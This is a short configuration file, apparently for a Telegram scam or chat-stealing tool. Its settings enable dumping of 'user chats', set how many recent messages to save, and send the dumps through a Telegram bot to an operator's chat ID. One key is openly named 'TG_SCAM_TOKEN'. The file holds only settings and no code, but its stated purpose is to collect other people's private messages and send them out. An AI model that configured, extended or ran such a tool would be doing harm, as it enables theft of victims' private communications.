DUMP_CHATS = 0 # 1 if you want dump user chats
DUMP_LEN = 3 # How many last messages you want to save for chat dump (don't set more than 100 cuz dump can take up to 5 minutes)


# Api Settings (https://my.telegram.org/apps):
APIID = 
APIHASH = 

# Telegram bot settings:
TG_BOT_ENABLED = 1 # if 1 tg bot dumps is enabled
TG_TOKEN =  # Bot token
TG_CHATID =  # Chat id for sending dumps
TG_SCAM_TOKEN = # i dont remember
